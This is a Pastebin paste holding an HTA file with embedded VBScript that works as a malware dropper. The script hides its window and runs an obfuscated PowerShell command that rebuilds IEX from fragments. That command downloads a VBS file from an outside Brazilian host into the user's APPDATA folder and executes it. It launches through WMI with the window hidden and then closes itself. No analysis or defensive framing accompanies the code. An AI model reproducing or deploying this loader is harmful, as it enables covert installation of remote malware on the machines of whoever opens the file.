Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <head>
- <HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SYSMENU="no" CAPTION="no" />
- <SCRIPT Language="VBScript">
- gshjgjshsjhsusyuiweiwuwiuwiuiww = "Powershell $r='KEX'.replace('K','I'); sal D $r;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''http://cbmiconstrutora.com.br/continuacao/Protected%20Client.vbs'',$env:APPDATA+''\\''+''VHF.vbs'')'|D; start-process($env:APPDATA+'\\'+'VHF.vbs')"
- Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
- Set yeteuyeuehjehejehjehejenhjehejhejhejehje = objWMIService.Get("Win32_ProcessStartup")
- Set objConfig = yeteuyeuehjehejehjehejenhjehejhejhejehje.SpawnInstance_
- objConfig.ShowWindow = 0
- Set objProcess = objWMIService.Get("Win32_Process")
- intReturn = objProcess.Create(gshjgjshsjhsusyuiweiwuwiuwiuiww, Null, objConfig, intProcessID)
- self.close
- </SCRIPT>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement